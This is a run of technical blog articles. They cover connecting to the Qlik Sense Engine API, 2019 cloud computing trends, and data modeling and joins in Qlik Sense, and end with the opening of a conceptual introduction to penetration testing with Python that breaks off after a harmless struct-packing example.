We created a new module from the start, covering the most frequently used elements in a module: models, the three basic types of views (form, list, and search), business logic in model methods, and access security. Always remember, when adding model fields, an upgrade is needed. When changing Python code, including the manifest file, a restart is needed.
When changing XML or CSV files, an upgrade is needed; also, when in doubt, do both: restart the server and upgrade the modules. Resources for Article: Further resources on this subject: Getting Started with Odoo Development [Article] Introduction to Odoo [Article] Web Server Development [Article]

5 ways to create a connection to the Qlik Engine [Tip]

Amey Varangaonkar
13 Jun 2018
8 min read
With mashups or web apps, the Qlik Engine sits outside of your project and is not accessible or loaded by default. The first step before doing anything else is to create a connection with the Qlik Engine, after which you can continue to open a session and perform further actions on that app, such as:

Opening a document/app
Making selections
Retrieving visualizations and apps

For using the Qlik Engine API, open a WebSocket to the engine. There may be a difference in the way you do this, depending on whether you are working with Qlik Sense Enterprise or Qlik Sense Desktop. In this article, we will elaborate on how you can achieve a connection to the Qlik Engine and the benefits of doing so. The following excerpt has been taken from the book Mastering Qlik Sense, authored by Martin Mahler and Juan Ignacio Vitantonio.

Creating a connection

To create a connection using WebSockets, you first need to establish a new WebSocket communication line. To open a WebSocket to the engine, use one of the following URIs:

Qlik Sense Enterprise: wss://server.domain.com:4747/app/ or wss://server.domain.com[/virtual proxy]/app/
Qlik Sense Desktop: ws://localhost:4848/app

Creating a connection using WebSockets

In the case of Qlik Sense Desktop, all you need to do is define a WebSocket variable, including its connection string, in the following way: var ws = new WebSocket("ws://localhost:4848/app/"); Once the connection is opened, which you can detect with the ws.onopen handler, you can call additional engine methods using ws.send(). This example will retrieve the list of available documents in my Qlik Sense Desktop environment and append them to an HTML list:

<html>
<body>
  <ul id='docList'>
  </ul>
</body>
</html>
<script>
  var ws = new WebSocket("ws://localhost:4848/app/");
  var request = {
    "handle": -1,
    "method": "GetDocList",
    "params": {},
    "outKey": -1,
    "id": 2
  }
  ws.onopen = function(event){
    ws.send(JSON.stringify(request));
    // Receive the response
    ws.onmessage = function (event) {
      var response = JSON.parse(event.data);
      if(response.method != 'OnConnected'){
        var docList = response.result.qDocList;
        var list = '';
        docList.forEach(function(doc){
          list += '<li>'+doc.qDocName+'</li>';
        })
        document.getElementById('docList').innerHTML = list;
      }
    }
  }
</script>

The preceding example will produce a list of the available documents in your browser if you have Qlik Sense Desktop running in the background. All Engine methods and calls can be tested in a user-friendly way by exploring the Qlik Engine in the Dev Hub. A single WebSocket connection can be associated with only one engine session (consisting of the app context, plus the user). If you need to work with multiple apps, you must open a separate WebSocket for each one. If you wish to create a WebSocket connection directly to an app, you can extend the configuration URL to include the application name or, in the case of Qlik Sense Enterprise, the app GUID. You can then use the methods from the app class and any other classes as you continue to work with objects within the app.

var ws = new WebSocket("ws://localhost:4848/app/MasteringQlikSense.qvf");

Creating a connection to the Qlik Server Engine

Connecting to the engine on a Qlik Sense server environment is a little bit different, as you will need to take care of authentication first.
Authentication is handled in different ways, depending on how you have set up your server configuration, with the most common ones being: Ticketing Certificates Header authentication Authentication also depends on where the code that is interacting with the Qlik Engine is running. If your code is running on a trusted computer, authentication can be performed in several ways, depending on how your installation is configured and where the code is running: If you are running the code from a trusted computer, you can use certificates, which first need to be exported via the QMC If the code is running on a web browser, or certificates are not available, then you must authenticate via the virtual proxy of the server Creating a connection using certificates Certificates can be considered as a seal of trust, which allows you to communicate with the Qlik Engine directly with full permission. As such, only backend solutions ever have access to certificates, and you should guard how you distribute them carefully. To connect using certificates, you first need to export them via the QMC, which is a relatively easy thing to do: Once they are exported, you need to copy them to the folder where your project is located using the following code: <html> <body> <h1>Mastering QS</h1> </body> <script> var certPath = path.join('C:', 'ProgramData', 'Qlik', 'Sense', 'Repository', 'Exported Certificates', '.Local Certificates'); var certificates = { cert: fs.readFileSync(path.resolve(certPath, 'client.pem')), key: fs.readFileSync(path.resolve(certPath, 'client_key.pem')), root: fs.readFileSync(path.resolve(certPath, 'root.pem')) }; // Open a WebSocket using the engine port (rather than going through the proxy) var ws = new WebSocket('wss://server.domain.com:4747/app/', { ca: certificates.root, cert: certificates.cert, key: certificates.key, headers: { 'X-Qlik-User': 'UserDirectory=internal; UserId=sa_engine' } }); ws.onopen = function (event) { // Call your methods } </script> Creating a connection using the Mashup API Now, while connecting to the engine is a fundamental step to start interacting with Qlik, it's very low-level, connecting via WebSockets. For advanced use cases, the Mashup API is one way to help you get up to speed with a more developer-friendly abstraction layer. The Mashup API utilizes the qlik interface as an external interface to Qlik Sense, used for mashups and for including Qlik Sense objects in external web pages. To load the qlik module, you first need to ensure RequireJS is available in your main project file. You will then have to specify the URL of your Qlik Sense environment, as well as the prefix of the virtual proxy, if there is one: <html> <body> <h1>Mastering QS</h1> </body> </html> <script src="https://cdnjs.cloudflare.com/ajax/libs/require.js/2.3.5/require.min.js"> <script> //Prefix is used for when a virtual proxy is used with the browser. var prefix = window.location.pathname.substr( 0, window.location.pathname.toLowerCase().lastIndexOf( "/extensions" ) + 1 ); //Config for retrieving the qlik.js module from the Qlik Sense Server var config = { host: window.location.hostname, prefix: prefix, port: window.location.port, isSecure: window.location.protocol === "https:" }; require.config({ baseUrl: (config.isSecure ? "https://" : "http://" ) + config.host + (config.port ? 
":" + config.port : "" ) + config.prefix + "resources" }); require(["js/qlik"], function (qlik) { qlik.setOnError( function (error) { console.log(error); }); //Open an App var app = qlik.openApp('MasteringQlikSense.qvf', config); </script> Once you have created the connection to an app, you can start leveraging the full API by conveniently creating HyperCubes, connecting to fields, passing selections, retrieving objects, and much more. The Mashup API is intended for browser-based projects where authentication is handled in the same way as if you were going to open Qlik Sense. If you wish to use the Mashup API, or some parts of it, with a backend solution, you need to take care of authentication first. Creating a connection using enigma.js Enigma is Qlik's open-source promise wrapper for the engine. You can use enigma directly when you're in the Mashup API, or you can load it as a separate module. When you are writing code from within the Mashup API, you can retrieve the correct schema directly from the list of available modules which are loaded together with qlik.js via 'autogenerated/qix/engine-api'.   The following example will connect to a Demo App using enigma.js: define(function () { return function () { require(['qlik','enigma','autogenerated/qix/engine-api'], function (qlik, enigma, schema) { //The base config with all details filled in var config = { schema: schema, appId: "My Demo App.qvf", session:{ host:"localhost", port: 4848, prefix: "", unsecure: true, }, } //Now that we have a config, use that to connect to the //QIX service. enigma.getService("qix" , config).then(function(qlik){ qlik.global.openApp(config.appId) //Open App qlik.global.openApp(config.appId).then(function(app){ //Create SessionObject for FieldList app.createSessionObject( { qFieldListDef: { qShowSystem: false, qShowHidden: false, qShowSrcTables: true, qShowSemantic: true, qShowDerivedFields: true }, qInfo: { qId: "FieldList", qType: "FieldList" } } ).then( function(list) { return list.getLayout(); } ).then( function(listLayout) { return listLayout.qFieldList.qItems; } ).then( function(fieldItems) { console.log(fieldItems) } ); }) } })}}) It's essential to also load the correct schema whenever you load enigma.js. The schema is a collection of the available API methods that can be utilized in each version of Qlik Sense. This means your schema needs to be in sync with your QS version. Thus, we see it is fairly easy to create a stable connection with the Qlik Engine API. If you liked the above excerpt, make sure you check out the book Mastering Qlik Sense to learn more tips and tricks on working with different kinds of data using Qlik Sense and extract useful business insights. How Qlik Sense is driving self-service Business Intelligence Overview of a Qlik Sense® Application’s Life Cycle What we learned from Qlik Qonnections 2018
Cloud computing trends in 2019

Guest Contributor
07 Jan 2019
8 min read
Cloud computing is a rapidly growing technology that many organizations are adopting to enable their digital transformation. As per the latest Gartner report, the cloud tech services market is projected to grow 17.3% ($206 billion) in 2019, up from $175.8 billion in 2018 and by 2022, 90% of organizations will be using cloud services. In today’s world, Cloud technology is a trending buzzword among business environments. It provides exciting new opportunities for businesses to compete on a global scale and is redefining the way we do business. It enables a user to store and share data like applications, files, and more to remote locations. These features have been realized by all business owners, from startup to well-established organizations, and they have already started using cloud computing. How Cloud technology helps businesses Reduced Cost One of the most obvious advantages small businesses can get by shifting to the cloud is saving money. It can provide small business with services at affordable and scalable prices. Virtualization expands the value of physical equipment, which means companies can achieve more with less. Therefore, an organization can see a significant decline in power consumption, rack space, IT requirements, and more. As a result, there is lower maintenance, installation, hardware, support & upgrade costs. For small businesses, particularly, those savings are essential. Enhanced Flexibility Cloud can access data and related files from any location and from any device at any time with an internet connection. As the working process is changing to flexible and remote working, it is essential to provide work-related data access to employees, even when they are not at a workplace. Cloud computing not only helps employees to work outside of the office premises but also allows employers to manage their business as and when required. Also, enhanced flexibility & mobility in cloud technology can lead to additional cost savings. For example, an employer can select to execute BYOD (bring your own device). Therefore, employees can bring and work on their own devices which they are comfortable in.. Secured Data Improved data security is another asset of cloud computing. With traditional data storage systems, the data can be easily stolen or damaged. There can also be more chances for serious cyber attacks like viruses, malware, and hacking. Human errors and power outages can also affect data security. However, if you use cloud computing, you will get the advantages of improved data security. In the cloud, the data is protected in various ways such as anti-virus, encryption methods, and many more. Additionally, to reduce the chance of data loss, the cloud services help you to remain in compliance with HIPAA, PCI, and other regulations. Effective Collaboration Effective collaboration is possible through the cloud which helps small businesses to track and oversee workflow and progress for effective results. There are many cloud collaboration tools available in the market such as Google Drive, Salesforce, Basecamp, Hive, etc. These tools allow users to create, edit, save and share documents for workplace collaboration. A user can also constrain the access of these materials. Greater Integration Cloud-based business solutions can create various simplified integration opportunities with numerous cloud-based providers. They can also get benefits of specialized services that integrate with back-office operations such as HR, accounting, and marketing. 
This type of integration makes business owners concentrate on the core areas of a business. Scalability One of the great aspects of cloud-based services is their scalability. Currently, a small business may require limited storage, mobility, and more. But in future, needs & requirements will increase significantly in parallel with the growth of the business.  Considering that growth does not always occur linearly, cloud-based solutions can accommodate all sudden and increased requirements of the organization. Cloud-based services have the flexibility to scale up or to scale down. This feature ensures that all your requirements are served according to your budget plans. Cloud Computing Trends in 2019 Hybrid & Multi-Cloud Solutions Hybrid Cloud will become the dominant business model in the future. For organizations, the public cloud cannot be a good fit for all type of solutions and shifting everything to the cloud can be a difficult task as they have certain requirements. The Hybrid Cloud model offers a transition solution that blends the current on-premises infrastructure with open cloud & private cloud services. Thus, organizations will be able to shift to the cloud technology at their own pace while being effective and flexible. Multi-Cloud is the next step in the cloud evolution. It enables users to control and run an application, workload, or data on any cloud (private, public and hybrid) based on their technical requirements. Thus, a company can have multiple public and private clouds or multiple hybrid clouds, all either connected together or not. We can expect multi-cloud strategies to dominate in the coming days. Backup and Disaster Recovery According to Spiceworks report,  15% of the cloud budget is allocated to Backup and Disaster Recovery (DR) solutions, which is the highest budget allocation, followed by email hosting and productivity tools. This huge percentage impacts the shared responsibility model that public cloud providers operate on. Public cloud providers, like as AWS (Amazon Web Services ), Microsoft Azure, Google Cloud are responsible for the availability of Backup and DR solutions and security of the infrastructure, while the users are in charge for their data protection and compliance. Serverless Computing Serverless Computing is gaining more popularity and will continue to do so in 2019. It is a procedure utilized by Cloud users, who request a container PaaS (Platform as a Service), and Cloud supplier charges for the PaaS as required. The customer does not need to buy or rent services before and doesn't need to configure them. The Cloud is responsible for providing the platform, it’s configuration, and a wide range of helpful tools for designing applications, and working with data. Data Containers The process of Data Container usage will become easier in 2019. Containers are more popular for transferring data, they store and organize virtual objects, and resolve the issues of having software run reliably while transferring the data from one system to another. However, there are some confinements. While containers are used to transport, they can only be used with servers having compatible operating system “kernels.” Artificial Intelligence Platforms The utilization of AI to process Big Data is one of the more important upgrades in collecting business intelligence data and giving a superior comprehension of how business functions. AI platform supports a faster, more effective, and more efficient approach to work together with data scientists and other team members. 
It can help to reduce costs in a variety of ways, such as making simple tasks automated, preventing the duplication of effort, and taking over some expensive labor tasks, such as copying or extraction of data. Edge computing Edge computing is a systematic approach to execute data processing at the edge of the network to streamline cloud computing. It is a result of ever increased use of IoT devices. Edge is essential to run real-time services as it streamlines the flow of traffic from IoT devices and provides real-time data analytics and analysis. Hence, it is also on the rise in 2019. Service mesh Service mesh is a dedicated system layer to enhance service to service communication across microservices applications. It's a new and emerging class of service management for the inter-microservice communication complexity and provides observability and tracing in a seamless way. As containers become more prevalent for cloud-based application development, the requirement for service mesh is increasing significantly. Service meshes can help oversee traffic through service discovery, load balancing, routing, and observability. Service meshes attempt to diminish the complexity of containers and improve network functionality. Cloud Security As we see the rise in technology, security is obviously another serious consideration. With the introduction of the GDPR (General Data Protection Regulation) security concerns have risen much higher and are the essential thing to look after. Many businesses are shifting to cloud computing without any serious consideration of its security compliance protocols. Therefore, GDPR will be an important thing in 2019 and the organization must ensure that their data practices are both safe and compliant. Conclusion As we discussed above, cloud technology is capable of providing better data storage, data security, collaboration, and it also changes the workflow to help small business owners to take better decisions. Finally, cloud connectivity is all about convenience, and streamlining workflow to help any business become more flexible, efficient, productive, and successful. If you want to set your business up for success, this might be the time to transition to cloud-based services. Author Bio Amarendra Babu L loves pursuing excellence through writing and has a passion for technology. He is presently working as a content contributor for Mindmajix.com and Tekslate.com. He is a tech-geek and love to explore new opportunities. His work has been published on various sites related to Big Data, Business Analytics & Intelligence, Blockchain, Cloud Computing, Data Science, AI & ML, Project Management, and more. You can reach him at [email protected]. He is also available on Linkedin. 8 programming languages to learn in 2019 18 people in tech every programmer and software engineer need to follow in 2019 We discuss the key trends for web and app developers in 2019 [Podcast]

Implementing Data Modeling techniques in Qlik Sense [Tutorial]

Bhagyashree R
17 Jul 2019
14 min read
Data modeling is a conceptual process, representing the associations between the data in a manner in which it caters to specific business requirements. In this process, the various data tables are linked as per the business rules to achieve business needs. This article is taken from the book Hands-On Business Intelligence with Qlik Sense by Kaushik Solanki, Pablo Labbe, Clever Anjos, and Jerry DiMaso. By the end of this book, you will be well-equipped to run successful business intelligence applications using Qlik Sense's functionality, data modeling techniques, and visualization best practices. To follow along with the examples implemented in this article, you can download the code from the book’s GitHub repository. In this article, we will look at the basic concept of data modeling, its various types, and learn which technique is best suited for Qlik Sense dashboards. We will also learn about the methods for linking data with each other using joins and concatenation. Technical requirements For this article, we will use the app created earlier in the book, as a starting point with a loaded data model. You can find it in the book's GitHub repository. You can also download the initial and final version of the application from the repository. After downloading the initial version of the application, perform the following steps: If you are using Qlik Sense Desktop, place the app in the Qlik\Sense\Apps folder under your Documents personal folder If you are using Qlik Sense Cloud, upload the app to your personal workspace Advantages of data modeling Data modeling helps business in many ways. Let's look at some of the advantages of data modeling: High-speed retrieval: Data modeling helps to get the required information much faster than expected. This is because the data is interlinked between the different tables using the relationship. Provides ease of accessing data: Data modeling eases the process of giving the right access to the data to the end-users. With the simple data query language, you can get the required data easily. Helps in handling multiple relations: Various datasets have various kinds of relationship between the other data. For example, there could be one-to-one, or one-to-many, or many-to-many relationships. Data modeling helps in handling this kind of relationship easily. Stability: Data modeling provides stability to the system. Data modeling techniques There are various techniques in which data models can be built, each technique has its own advantages and disadvantages. The following are two widely-used data modeling techniques. Entity-relationship modeling The entity-relationship modeling (ER modeling) technique uses the entity and relationships to create a logical data model.  This technique is best suited for the Online Transaction Processing (OLTP) systems. An entity in this model refers to anything or object in the real world that has distinguishable characteristics. While a relationship in this model is the relationship between the two or more entities. There are three basic types of relationship that can exist: One-to-one: This relation means each value from one entity has a single relation with a value from the other entity. For example, one customer is handled by one sales representative: One-to-many: This relation means each value from one entity has multiple relations with values from other entities. 
For example, one sales representative handles multiple customers: Many-to-many: This relation means all values from both entities have multiple relations with each other. For example, one book can have many authors and each author can have multiple books: Dimensional modeling The dimensional modeling technique uses facts and dimensions to build the data model. This modeling technique was developed by Ralf Kimball. Unlike ER modeling, which uses normalization to build the model, this technique uses the denormalization of data to build the model. Facts, in this context, are tables that store the most granular transactional details. They mainly store the performance measurement metrics, which are the outcome of the business process. Fact tables are huge in size, because they store the transactional records. For example, let's say that sales data is captured at a retail store. The fact table for such data would look like the following: A fact table has the following characteristics: It contains the measures, which are mostly numeric in nature It stores the foreign key, which refers to the dimension tables It stores large numbers of records Mostly, it does not contain descriptive data The dimension table stores the descriptive data, describing the who, what, which, when, how, where, and why associated with the transaction. It has the maximum number of columns, but the records are generally fewer than fact tables. Dimension tables are also referred to as companions of the fact table. They store textual, and sometimes numerical, values. For example, a PIN code is numeric in nature, but they are not the measures and thus they get stored in the dimension table. In the previous sales example that we discussed, the customer, product, time, and salesperson are the dimension tables. The following diagram shows a sample dimension table: The following are the characteristics of the dimension table: It stores descriptive data, which describes the attributes of the transaction It contains many columns and fewer records compared to the fact table It also contains numeric data, which is descriptive in nature There are two types of dimensional modeling techniques that are widely used: Star schema: This schema model has one fact table that is linked with multiple dimension tables. The name star is given because once the model is ready, it looks like a star. The advantages of the star schema model include the following: Better query performance Simple to understand The following diagram shows an example of the star schema model: Snowflake schema: This schema model is similar to the star schema, but in this model, the dimensional tables are normalized further. The advantages of the snowflake schema model include the following: It provides better referential integrity It requires less space as data is normalized The following diagram shows an example of the snowflake schema model: When it comes to data modeling in Qlik Sense, the best option is to use the star schema model for better performance. Qlik Sense works very well when the data is loaded in a denormalized form, thus the star schema is suitable for Qlik Sense development. The following diagram shows the performance impact of different data models on Qlik Sense: Now that we know what data modeling is and which technique is most appropriate for Qlik Sense data modeling, let's look at some other fundamentals of handling data. 
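Before moving on, here is a small load script sketch of what the star schema from the retail example might look like in Qlik Sense terms. The field values are illustrative placeholders rather than data from the book; the point is that one fact table carries the measures and foreign keys, the dimension tables carry the descriptions, and Qlik Sense associates them automatically through the identically named key fields:

SalesFact:
LOAD * INLINE [
CustomerID, ProductID, SalesQty, SalesAmount
1, 10, 2, 200
2, 20, 1, 150
];

Customer:
LOAD * INLINE [
CustomerID, CustomerName, City
1, Alex, London
2, Linda, Berlin
];

Product:
LOAD * INLINE [
ProductID, ProductName, Category
10, Apples, Fruits
20, Carrots, Vegetables
];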
Joining While working on data model building, we often encounter a situation where we want to have some fields added from one table into another to do some sort of calculations. In such situations, we use the option of joining those tables based on the common fields between them. Let's understand how we can use joins between tables with a simple example. Assume you want to calculate the selling price of a product. The information you have is SalesQty in Sales Table and UnitPrice of product in Product Table. The calculation for getting the sales price is UnitPrice * SalesQty. Now, let's see what output we get when we apply a join on these tables: Types of joins There are various kinds of joins available but let's take a look at the various types of joins supported by Qlik Sense. Let's consider the following tables to understand each type better: Order table: This table stores the order-related data: OrderNumber Product CustomerID OrderValue 100 Fruits 1 100 101 Fruits 2 80 102 Fruits 3 120 103 Vegetables 6 200 Customer table: This table stores the customer details, which include the CustomerID and Name: CustomerID Name 1 Alex 2 Linda 3 Sam 4 Michael 5 Sara Join/outer join When you want to get the data from both the tables you use the Join keyword. When you just use only Join between two tables, it is always a full outer join. The Outer keyword is optional. The following diagram shows the Venn diagram for the outer join: Now, let's see how we script this joining condition in Qlik Sense: Create a new Qlik Sense application. Give it a name of your choice. Jump to Script editor, create a new tab, and rename it as Outer Join, as shown in the following screenshot. Write the script shown in the following screenshot: Once you write the script, click on Load Data to run the script and load the data. Once the data is loaded, create a new sheet and add the Table object to see the joined table data, as shown in the following screenshot: As the output of Outer Join, we got five fields, as shown in the preceding screenshot. You can also observe that the last two rows have null values for the fields, which come from the Order table, where the customers 4 and 5 are not present. Left join When you want to extract all the records from the left table and matching records from the right table, then you use the Left Join keyword to join those two tables. The following diagram shows the Venn diagram for left join: Let's see the script for left join: In the previous application created, delete the Outer Join tab. Create a new tab and rename it as Left Join, as shown in the following screenshot. Write the script shown in the following screenshot: Once the script is written, click on Load Data to run the script and load the data. Once the script is finished, create a new sheet and add the Table object to see the joined table data, as shown in the following screenshot: Right join When you want to extract all the records from the right table and the matching records from the left table, then you use the right join keyword to join those two tables. The following diagram shows the Venn diagram for right join: Let's see the script for right join: In the previous application created, comment the existing script. Create a new tab and rename it as Right Join, as shown in the following screenshot. Write the script, as shown in the following screenshot: Once the script is written, click on Load Data to run the script and load the data. 
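Since the screenshots containing the actual scripts are not reproduced here, the following is a sketch of roughly what the Outer Join script might look like for the Order and Customer tables above, using inline loads that mirror the sample rows. For the later variants, switching the plain Join keyword to Left Join, Right Join, or Inner Join is essentially the only change:

Orders:
LOAD * INLINE [
OrderNumber, Product, CustomerID, OrderValue
100, Fruits, 1, 100
101, Fruits, 2, 80
102, Fruits, 3, 120
103, Vegetables, 6, 200
];

// A plain Join in Qlik script is a full outer join on the common field (CustomerID)
Join (Orders)
LOAD * INLINE [
CustomerID, Name
1, Alex
2, Linda
3, Sam
4, Michael
5, Sara
];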
Once the script is finished, create a new sheet and add the Table object to see the joined table data, as shown in the following screenshot: Inner join When you want to extract matching records from both the tables, you use the Inner Join keyword to join those two tables. The following diagram shows the Venn diagram for inner join: Let's see the script for inner join: In the previous application created, comment the existing script. Create a new tab and rename it as Inner Join, as shown in the following screenshot. Write the script shown in following screenshot: Once the script is written, click on Load Data to run the script and load the data. Once the script is finished, create a new sheet and add the Table object to see the joined table data, as shown in the following screenshot: Concatenation Sometimes you come across a situation while building the data model where you may have to append one table below another. In such situations, you can use the concatenate function. Concatenating, as the name suggests, helps to add the records of one table below another. Concatenate is different from joins. Unlike joins, concatenate does not merge the matching records of both the tables in a single row. Automatic concatenation When the number of columns and their naming is same in two tables, Qlik Sense, by default, concatenates those tables without any explicit command. This is called the automatic concatenation. For example, you may get the customer information from two different sources, but with the same columns names. In such a case, automatic concatenation will be done by Qlik, as is shown in the following screenshot: You can see in the preceding screenshot that both the Source1 and Source2 tables have two columns with same names (note that names in Qlik Sense are case-sensitive). Thus, they are auto concatenated. One more thing to note here is that, in such a situation, Qlik Sense ignores the name given to the second table and stores all the data under the name given to the first table. The output table after concatenation is shown in the following screenshot: Forced concatenation There will be some cases in which you would like to concatenate two tables irrespective of the number of columns and name. In such a case, you should use the keyword Concatenate between two Load statements to concatenate those two tables. This is called the forced concatenation. For example, if you have sales and budget data at similar granularity, then you should use the Concatenate keyword to forcefully concatenate both tables, as shown in the following screenshot: The output table after loading this script will have data for common columns, one below the other. For the columns that are not same, there will be null values in those columns for the table in which they didn't exist. This is shown in the following output: You can see in the preceding screenshot that the SalesAmount is null for the budget data, and Budget is null for the sales data. The NoConcatenate In some situations when even though the columns and their name from the two tables are the same, you may want to treat them differently and don’t want to concatenate them. So Qlik Sense provides the NoConcatenate keyword, which helps to prevent automatic concatenation. Let's see how to write the script for NoConcatenate: You should handle the tables properly; otherwise, the output of NoConcatenate may create a synthetic table. Filtering In this section, we will learn how to filter the data while loading in Qlik Sense. 
As you know, there are two ways in which we can load the data in Qlik Sense: either by using the Data manager or the script editor. Let's see how to filter data with each of these options. Filtering data using the Data manager When you load data using the Data manager, you get an option named Filters at the top-right corner of the window, as shown in the following screenshot: This filter option enables us to set the filtering condition, which loads only the data that satisfies the condition given. The filter option allows the following conditions: = >  >= <  <= Using the preceding conditions, you can filter the text or numeric values of a field. For example, you can set a condition such as Date >= '01/01/2012' or ProductID = 80. The following screenshot shows such conditions applied in the Data load editor: Filtering data in the script editor If you are familiar with the Load statement or the SQL Select statement, it will be easy for you to filter the data while loading it. In the script editor, the best way to restrict the data is to include the Where clause at the end of the Load or Select statement; for example, Where Date >= '01/01/2012'. When you use the Where clause with the Load statement, you can use the following conditions: = > >= <  <= When you write the Where clause with the SQL Select statement, you can use the following conditions: = >  >= <  <= In Between Like Is Null Is Not Null The following screenshot shows an example of both the statements: This article walked you through various data modeling techniques. We also saw different types of joins and how we can implement them in Qlik Sense.  Then, we learned about concatenation and the scenarios in which we should use the concatenation option. We also looked at automatic concatenation, forced concatenation, and NoConcatenation. Further, we learned about the ways in which data can be filtered while loading in Qlik Sense. If you found this post useful, do check out the book, Hands-On Business Intelligence with Qlik Sense. This book teaches you how to create dynamic dashboards to bring interactive data visualization to your enterprise using Qlik Sense. 5 ways to create a connection to the Qlik Engine [Tip] What we learned from Qlik Qonnections 2018 Why AWS is the preferred cloud platform for developers working with big data

Pentesting Using Python

Packt
04 Feb 2015
22 min read
 In this article by the author, Mohit, of the book, Python Penetration Testing Essentials, Penetration (pen) tester and hacker are similar terms. The difference is that penetration testers work for an organization to prevent hacking attempts, while hackers hack for any purpose such as fame, selling vulnerability for money, or to exploit vulnerability for personal enmity. Lots of well-trained hackers have got jobs in the information security field by hacking into a system and then informing the victim of the security bug(s) so that they might be fixed. A hacker is called a penetration tester when they work for an organization or company to secure its system. A pentester performs hacking attempts to break the network after getting legal approval from the client and then presents a report of their findings. To become an expert in pentesting, a person should have deep knowledge of the concepts of their technology.  (For more resources related to this topic, see here.) Introducing the scope of pentesting In simple words, penetration testing is to test the information security measures of a company. Information security measures entail a company's network, database, website, public-facing servers, security policies, and everything else specified by the client. At the end of the day, a pentester must present a detailed report of their findings such as weakness, vulnerability in the company's infrastructure, and the risk level of particular vulnerability, and provide solutions if possible. The need for pentesting There are several points that describe the significance of pentesting: Pentesting identifies the threats that might expose the confidentiality of an organization Expert pentesting provides assurance to the organization with a complete and detailed assessment of organizational security Pentesting assesses the network's efficiency by producing huge amount of traffic and scrutinizes the security of devices such as firewalls, routers, and switches Changing or upgrading the existing infrastructure of software, hardware, or network design might lead to vulnerabilities that can be detected by pentesting In today's world, potential threats are increasing significantly; pentesting is a proactive exercise to minimize the chance of being exploited Pentesting ensures whether suitable security policies are being followed or not Consider an example of a well-reputed e-commerce company that makes money from online business. A hacker or group of black hat hackers find a vulnerability in the company's website and hack it. The amount of loss the company will have to bear will be tremendous. Components to be tested An organization should conduct a risk assessment operation before pentesting; this will help identify the main threats such as misconfiguration or vulnerability in: Routers, switches, or gateways Public-facing systems; websites, DMZ, e-mail servers, and remote systems DNS, firewalls, proxy servers, FTP, and web servers Testing should be performed on all hardware and software components of a network security system. Qualities of a good pentester The following points describe the qualities of good pentester. 
They should: Choose a suitable set of tests and tools that balance cost and benefits Follow suitable procedures with proper planning and documentation Establish the scope for each penetration test, such as objectives, limitations, and the justification of procedures Be ready to show how to exploit the vulnerabilities State the potential risks and findings clearly in the final report and provide methods to mitigate the risk if possible Keep themselves updated at all times because technology is advancing rapidly A pentester tests the network using manual techniques or the relevant tools. There are lots of tools available in the market. Some of them are open source and some of them are highly expensive. With the help of programming, a programmer can make his own tools. By creating your own tools, you can clear your concepts and also perform more R&D. If you are interested in pentesting and want to make your own tools, then the Python programming language is the best, as extensive and freely available pentesting packages are available in Python, in addition to its ease of programming. This simplicity, along with the third-party libraries such as scapy and mechanize, reduces code size. In Python, to make a program, you don't need to define big classes such as Java. It's more productive to write code in Python than in C, and high-level libraries are easily available for virtually any imaginable task. If you know some programming in Python and are interested in pentesting this book is ideal for you. Defining the scope of pentesting Before we get into pentesting, the scope of pentesting should be defined. The following points should be taken into account while defining the scope: You should develop the scope of the project in consultation with the client. For example, if Bob (the client) wants to test the entire network infrastructure of the organization, then pentester Alice would define the scope of pentesting by taking this network into account. Alice will consult Bob on whether any sensitive or restricted areas should be included or not. You should take into account time, people, and money. You should profile the test boundaries on the basis of an agreement signed by the pentester and the client. Changes in business practice might affect the scope. For example, the addition of a subnet, new system component installations, the addition or modification of a web server, and so on, might change the scope of pentesting. The scope of pentesting is defined in two types of tests: A non-destructive test: This test is limited to finding and carrying out the tests without any potential risks. It performs the following actions: Scans and identifies the remote system for potential vulnerabilities Investigates and verifies the findings Maps the vulnerabilities with proper exploits Exploits the remote system with proper care to avoid disruption Provides a proof of concept Does not attempt a Denial-of-Service (DoS) attack A destructive test: This test can produce risks. 
It performs the following actions: Attempts DoS and buffer overflow attacks, which have the potential to bring down the system Approaches to pentesting There are three types of approaches to pentesting: Black-box pentesting follows non-deterministic approach of testing You will be given just a company name It is like hacking with the knowledge of an outside attacker There is no need of any prior knowledge of the system It is time consuming White-box pentesting follows deterministic approach of testing You will be given complete knowledge of the infrastructure that needs to be tested This is like working as a malicious employee who has ample knowledge of the company's infrastructure You will be provided information on the company's infrastructure, network type, company's policies, do's and don'ts, the IP address, and the IPS/IDS firewall Gray-box pentesting follows hybrid approach of black and white box testing The tester usually has limited information on the target network/system that is provided by the client to lower costs and decrease trial and error on the part of the pentester It performs the security assessment and testing internally Introducing Python scripting Before you start reading this book, you should know the basics of Python programming, such as the basic syntax, variable type, data type tuple, list dictionary, functions, strings, methods, and so on. Two versions, 3.4 and 2.7.8, are available at python.org/downloads/. In this book, all experiments and demonstration have been done in Python 2.7.8 Version. If you use Linux OS such as Kali or BackTrack, then there will be no issue, because many programs, such as wireless sniffing, do not work on the Windows platform. Kali Linux also uses the 2.7 Version. If you love to work on Red Hat or CentOS, then this version is suitable for you. Most of the hackers choose this profession because they don't want to do programming. They want to use tools. However, without programming, a hacker cannot enhance his2 skills. Every time, they have to search the tools over the Internet. Believe me, after seeing its simplicity, you will love this language. Understanding the tests and tools you'll need To conduct scanning and sniffing pentesting, you will need a small network of attached devices. If you don't have a lab, you can make virtual machines in your computer. For wireless traffic analysis, you should have a wireless network. To conduct a web attack, you will need an Apache server running on the Linux platform. It will be a good idea to use CentOS or Red Hat Version 5 or 6 for the web server because this contains the RPM of Apache and PHP. For the Python script, we will use the Wireshark tool, which is open source and can be run on Windows as well as Linux platforms. Learning the common testing platforms with Python You will now perform pentesting; I hope you are well acquainted with networking fundamentals such as IP addresses, classful subnetting, classless subnetting, the meaning of ports, network addresses, and broadcast addresses. A pentester must be perfect in networking fundamentals as well as at least in one operating system; if you are thinking of using Linux, then you are on the right track. In this book, we will execute our programs on Windows as well as Linux. In this book, Windows, CentOS, and Kali Linux will be used. A hacker always loves to work on a Linux system. As it is free and open source, Kali Linux marks the rebirth of BackTrack and is like an arsenal of hacking tools. 
Kali Linux NetHunter is the first open source Android penetration testing platform for Nexus devices. However, some tools work on both Linux and Windows, but on Windows, you have to install those tools. I expect you to have knowledge of Linux. Now, it's time to work with networking on Python.

Implementing a network sniffer by using Python

Before learning about the implementation of a network sniffer, let's learn about a particular struct method:

- struct.pack(fmt, v1, v2, ...): This method returns a string that contains the values v1, v2, and so on, packed according to the given format
- struct.unpack(fmt, string): This method unpacks the string according to the given format

Let's discuss the code:

import struct
ms = struct.pack('hhl', 1, 2, 3)
print (ms)
k = struct.unpack('hhl', ms)
print k

The output for the preceding code is as follows:

G:\Python\Networking\network>python str1.py
